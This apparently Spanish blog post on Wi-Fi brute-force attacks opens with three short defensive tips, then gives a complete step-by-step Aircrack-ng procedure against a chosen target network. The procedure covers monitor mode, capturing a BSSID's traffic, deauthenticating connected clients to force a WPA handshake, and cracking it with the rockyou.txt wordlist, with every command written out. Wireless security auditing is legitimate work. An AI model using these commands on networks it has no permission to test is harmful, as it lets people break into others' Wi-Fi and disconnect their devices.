domingo, 13 de octubre de 2024

Ataque de Fuerza Bruta

 

Consejos para proteger una red:

  • Usar WPA3 en lugar de WPA/WPA2, ya que ofrece una mayor seguridad.
  • Configurar una contraseña compleja y aleatoria para evitar ataques de diccionario.
  • Desactivar WPS, que es un punto débil en muchos routers.

Procedimiento para realizar un ataque de fuerza bruta con Aircrack-ng:

  1. Instalar Aircrack-ng: Abre una terminal y ejecuta el siguiente comando para instalar el conjunto de herramientas:

sudo apt install aircrack-ng

Colocar la antena Wi-Fi en modo monitor: El modo monitor permite escuchar el tráfico de todas las redes cercanas. Para habilitarlo:

  • Obtén el nombre de tu interfaz de red Wi-Fi (generalmente algo como wlp1s0)


ifconfig


Inicia el modo monitor

sudo airmon-ng start wlp1s0

Verifica que la interfaz esté en modo monitor con

ifconfig



Escanear redes Wi-Fi cercanas: Usa airodump-ng para listar las redes Wi-Fi que están a tu alcance:

sudo airodump-ng wlp1s0mon

Se mostrará una lista de redes Wi-Fi. Identifica la red objetivo (copia el BSSID y el canal donde se encuentra).

Captura de tráfico de red: Para empezar a capturar el tráfico de la red objetivo, usa el BSSID y el canal que obtuviste:


sudo airodump-ng -c [CANAL] --bssid [BSSID] -w [NOMBRE_ARCHIVO] wlp1s0mon

Reemplaza [CANAL][BSSID] y [NOMBRE_ARCHIVO] con los valores apropiados



Desautenticar a un dispositivo de la red (opcional pero recomendado): Para acelerar la captura del handshake, desautentica a un cliente conectado a la red, forzándolo a reconectarse:



sudo aireplay-ng -0 9 -a [BSSID] -c [ESTACION] wlp1s0mon

Donde:

[BSSID] es el identificador de la red.

[ESTACION] es la dirección MAC del dispositivo conectado que deseas desautenticar (que aparece en la columna "Station" al ejecutar airodump-ng).

Nota: Ejecuta este comando varias veces hasta que se capture el handshake (en la pantalla de airodump-ng verás el mensaje "WPA handshake").



Verifica que el handshake ha sido capturado: Una vez que el handshake se capture correctamente, se generarán archivos con la extensión .cap. Este archivo contiene el tráfico capturado y es necesario para realizar el ataque de fuerza bruta.



Realizar el ataque de fuerza bruta: Usa el diccionario rockyou.txt (o cualquier otro diccionario de contraseñas) y el archivo .cap para ejecutar el ataque con aircrack-ng:



sudo aircrack-ng -b [BSSID] -w [DICCIONARIO] [ARCHIVO_CAP]

Reemplaza [BSSID], [DICCIONARIO], y [ARCHIVO_CAP] con los valores correspondientes.

Por ejemplo:

sudo aircrack-ng -b 78:94:B4:AE:44:53 -w rockyou.txt auditoria-01.cap



Restaurar la antena Wi-Fi a modo normal: Una vez que hayas terminado, vuelve a colocar la antena Wi-Fi en modo normal:

sudo airmon-ng stop wlp1s0mon

No hay comentarios:

Publicar un comentario